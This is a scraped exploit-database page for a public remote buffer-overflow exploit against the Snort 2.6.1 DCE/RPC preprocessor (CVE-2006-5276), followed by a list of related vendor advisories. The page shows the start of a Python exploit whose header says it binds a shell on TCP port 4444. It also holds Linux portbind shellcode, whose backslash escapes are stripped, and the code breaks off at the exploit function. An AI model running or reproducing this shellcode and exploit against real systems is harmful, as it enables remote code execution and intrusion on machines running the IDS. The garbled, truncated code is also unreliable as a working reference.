Lucene search
RootSSV:6573HistoryApr 03, 2007 - 12:00 a.m.
Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
2007-04-0300:00:00
Root
www.seebug.org
9
0.62 Medium
EPSS
Percentile
97.5%
No description provided by source.
#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from scapy import *
# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode = \"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96\"
shellcode += \"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56\"
shellcode += \"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1\"
shellcode += \"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0\"
shellcode += \"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53\"
shellcode += \"x89xe1xcdx80\"
def ExploitSnort(target):
# SMB packet borrowed from http://www.milw0rm
Related
nessus
nessus
GLSA-200703-01 : Snort: Remote execution of arbitrary code
2007-03-02 00:00:00
FreeBSD : snort -- DCE/RPC preprocessor vulnerability (afdf500f-c1f6-11db-95c5-000c6ec775d9)
2007-02-22 00:00:00
Fedora 7 : snort-2.7.0.1-3.fc7 (2007-2060)
2007-11-06 00:00:00
gentoo
gentoo
Snort: Remote execution of arbitrary code
2007-02-23 00:00:00
cve
cve
CVE-2006-5276
2007-02-20 01:28:00
openvas
openvas
Gentoo Security Advisory GLSA 200703-01 (snort)
2008-09-24 00:00:00
Fedora Update for snort FEDORA-2007-2060
2009-02-27 00:00:00
Gentoo Security Advisory GLSA 200703-01 (snort)
2008-09-24 00:00:00
fedora
fedora
[SECURITY] Fedora 7 Update: snort-2.7.0.1-3.fc7
2007-09-07 17:20:21
canvas
canvas
Immunity Canvas: SNORTRPC
2007-02-20 01:28:00
securityvulns
securityvulns
snort IDS buffer overflow
2007-02-20 00:00:00
cert
cert
exploitpack
exploitpack
Snort 2.6.1 (Linux) - DCERPC Preprocessor Remote Buffer Overflow
2007-03-30 00:00:00
packetstorm
packetstorm
Snort 2 DCE/RPC Preprocessor Buffer Overflow
2012-04-10 00:00:00
snort-py.txt
2007-02-24 00:00:00
checkpoint_advisories
checkpoint_advisories
saint
saint
Snort DCE/RPC preprocessor buffer overflow
2007-07-09 00:00:00
Snort DCE/RPC preprocessor buffer overflow
2007-07-09 00:00:00
Snort DCE/RPC preprocessor buffer overflow
2007-07-09 00:00:00
debiancve
debiancve
CVE-2006-5276
2007-02-20 01:28:00
ubuntucve
ubuntucve
CVE-2006-5276
2007-02-20 00:00:00
freebsd
freebsd
snort -- DCE/RPC preprocessor vulnerability
2007-02-19 00:00:00
exploitdb
exploitdb
Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
2007-03-30 00:00:00